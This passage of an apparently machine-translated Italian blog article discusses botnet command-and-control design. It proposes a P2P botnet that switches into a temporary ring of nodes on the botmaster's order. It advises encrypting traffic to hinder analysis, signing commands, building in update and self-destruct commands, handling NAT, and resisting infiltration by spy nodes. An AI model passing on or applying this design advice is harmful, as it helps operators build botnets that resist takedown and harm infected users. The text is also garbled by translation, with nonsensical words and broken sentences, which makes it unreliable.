È importante ricordare che con il passaggio infruttuoso non possiamo ottenere nulla a nulla. Ricorda algoritmi genetici , Verità? Prendilo apparentemente buona idea - P2P-Botnet, dove l'attacco è responsabile per l'assegnazione dei vicini. Quindi non abbiamo bisogno di alcun server!

Ma in questo caso, la complessità dell'attuazione aumenterà, anche se leggermente. I restanti problemi di botnet P2P rimarranno irrisolti. Vincere è insignificante, account 1: 1.

Alcuni seduti con un pezzo di carta e matita, ho dato vita alla seguente idea. Per quanto ne so, non aveva mai espresso prima, e io sono il primo a cui è venuto in piedi. CHSV PLUS 100.

Che se la rete ha due stati - "attivo" e "passivo". In condizioni passive, Botnet funziona secondo lo schema P2P. Botmaster invia il comando di "mobilizzare le truppe" e la rete si trasforma in mille. Nella sua squadra, il Botmaster deve specificare i nodi del tour e il tempo a cui la rete cambia la sua condizione. In modo che l'anello fosse di più, puoi dare una squadra a diversi robot per chiamare i tuoi vicini. Inoltre, tutti i comandi vengono trasmessi attraverso il tour. È responsabile per la nomina dei nuovi nodi dei "vicini". Se gli anelli TTL saranno successivamente risultano sufficienti, è possibile fornire il comando "Estendi attivo".

Tale botnet non eredita una singola rete minus P2P e avrà tutti i vantaggi della crostata, nonché:

  • Aumento della stabilità agli attacchi DDOS e ai filtri di rete, come la rete P2P.
  • Consumo di risorse minime da parte dei robot durante il tempo di inattività della rete. Botmaster non ha bisogno di tenere traccia dello stato della crostata e scegliere nuovi nodi per lui.
  • Durante la creazione dell'auto, solo quei nodi sono selezionati che attualmente online. I robot saranno collegati all'anello dal primo tentativo (per un po ').
  • La lista dei "vicini" è periodicamente aggiornata. Tutti gli stessi nodi IP inclusi nell'anello temporaneo conosce l'intera botnet. Quindi lascia che questi nodi considerano questi nodi, se una parte dei veri vicini non è apparsa sulla rete per molto tempo.

E l'unico inconveniente che vedo qui è la complessità dell'attuazione. Ma non è davvero un problema.

6. Cosa è importante da ricordare

Fino ad ora, in silenzio su alcuni punti, perché sono inerenti a uno dei nomi dei metodi di controllo Botnet. L'attenzione dovrebbe essere focalizzata su di loro.

  • Parte dei nodi non può ricevere connessioni in entrata a causa di firewall o nat. Al minimo, è necessario tenere in considerazione quando si scrive un bot. Ad esempio, quando si distribuiscono comandi nella rete P2P, il bot dovrebbe essere in grado di accedere periodicamente ai vicini stesso, e non aspettare la squadra da loro.
  • Dovrebbe essere proceduto dal fatto che tutti i comandi inviati dalle reti sono ascoltati. Al minimo, la persona interessata può modificare il codice BOT per questi scopi. Tuttavia, ha senso crittografa tutto il traffico trasmesso sulla rete. Al minimo, complicherà l'analisi della botnet.
  • Tutti i comandi Botmaster devono iscriversi firma digitale . Le password non sono adatte, perché possono essere intercettate.
  • Una volta avvenuto l'implementazione, noto che almeno tre squadre dovrebbero essere fornite in qualsiasi botnet - l'aggiornamento di Botmaster, l'aggiornamento del tasto Botmaster e l'autodistruzione dell'intera rete.
  • La rete ha nodi "spyware". Alcuni di loro sono inclusi nel tour. Allo stesso tempo, non conosciamo gli obiettivi che queste "spie" sono perseguitate - questa può essere la definizione di IP di Botmaster, rompendo l'esecuzione di team, tooltit la rete, ottenendo il controllo sulla botnet e così via. In particolare, ciò significa che i robot devono scegliere un nodo casuale quando si collega all'anello, e non usare tutto il tempo lo stesso.
  • Nella figura, i nodi aggiuntivi sono collegati ciascuno con ciascuno, ma molto più pratico per realizzare l'anello sotto forma di una piccola rete P2P, cioè secondo il principio "Neighbours".

Nota inoltre che le soluzioni 1 e 2 (server, molti server) sono private di molti svantaggi e ricevono un paio di vantaggi dalla risoluzione di 3 (fiducia) quando si utilizza il protocollo HTTP. Scorri di nuovo questi oggetti per capire cosa sono.

7. Conclusioni

Per piccole reti buona decisione è l'uso di IRC. Ad esempio, se si desidera creare la tua piccola rete per il calcolo distribuito, installare il bot su computer domestico, Laptop, Netbook, computer di lavoro (se consente la politica della società) e gestisci la rete tramite Dalnet. Se è necessario, in seguito la rete può essere "pompaggio" alla crostata. Prostituisci il comando appropriato, giusto?

Se è necessaria una bella interfaccia web per la botnet, potrebbe avere senso scrivere programma aggiuntivoche prenderà i comandi da un server Web e li inviano in IRC. Almeno considera questo approccio.

Soluzioni universali: questo è un tour e un p2p + tresting. Tali reti funzioneranno perfettamente indipendentemente da quanti nodi in essi, 1 o 1.000.000, senza server.

In considerazione della presenza di evidenti carenze nel "P2P puro" rispetto all'anello, rimane poco chiaro perché è considerata una buona soluzione. Sicuramente nei robot da cui la rete consiste, ce ne sono molti caratteristiche utili. Perché non aggiungere un altro piccolo carico utile - mobilitando la rete nel tour?

Qui, forse, tutto. Sarò felice di chiunque abbia i tuoi commenti. Soprattutto con critiche, istruzioni su imprecisioni / contraddizioni nel testo e alle tue idee sull'argomento sollevato.

La campana.

Ci sono quelli che hanno letto questa notizia prima di te.
Iscriviti per ricevere articoli freschi.
E-mail
Nome
Cognome
Come vuoi leggere la campana
Senza spam